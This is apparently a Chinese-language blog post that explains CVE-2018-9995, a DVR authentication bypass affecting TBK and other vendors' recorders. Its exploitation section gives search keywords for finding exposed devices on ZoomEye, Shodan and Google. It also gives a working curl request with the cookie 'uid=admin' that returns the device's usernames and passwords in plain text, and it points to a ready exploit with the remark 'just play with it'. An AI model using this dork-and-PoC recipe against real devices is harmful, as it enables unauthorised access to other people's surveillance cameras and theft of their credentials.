利用CVE-2018-9995进行DVR摄像头攻击
漏洞概述
DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取代模拟监控系统一大堆设备的功能。最初由阿根廷研究员发现,通过使用”Cookie: uid = admin”的Cookie标头来访问特定DVR的控制面板,DVR将以明文形式响应设备的管理员凭证。并且在GitHub发布了相关验证说明
最开始研究员发现CVE-2018-9995仅影响由TBK制造的DVR设备,但接下来发现,由其他供应商的产品同样受到影响,包括但不限于:Novo、cenova、qseepulnix、night owl。
漏洞利用
1.首先是寻找存在漏洞的设备,可使用Google、shodan、zoomeye等方式进行搜索。我们这里使用zoomeye为例;搜索关键字:”/longin.rsp”或者”GNU rsp/1.0″
2.使用curl工具可直接访问以下POC,即可获取账号密码
curl “http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list” -H “Cookie: uid=admin”
3.该漏洞现已有exp,下载后可直接食用。(我是传送门)
总结
小东西,玩玩就好。重要的是从该漏洞中获得的启示。时刻关注网络安全,及时更新补丁。